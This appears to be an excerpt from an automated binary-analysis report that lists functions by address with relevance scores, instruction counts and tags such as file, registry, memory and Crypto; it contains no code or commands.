Function 709A5B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Function 709A5B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Function 709A5D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 709A10CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 709A55B8, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 709A5DF0, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Function 709A3564, Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Function 70999144, Relevance: 2.4, Strings: 1, Instructions: 1104
COMMONCrypto

Function 7099A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 709984E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 709A92DC, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 709A14D8, Relevance: .6, Instructions: 572
COMMONCrypto

Function 70996DC8, Relevance: .0, Instructions: 36
COMMON

Function 7099BC00, Relevance: .0, Instructions: 16
COMMON

Function 007F2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON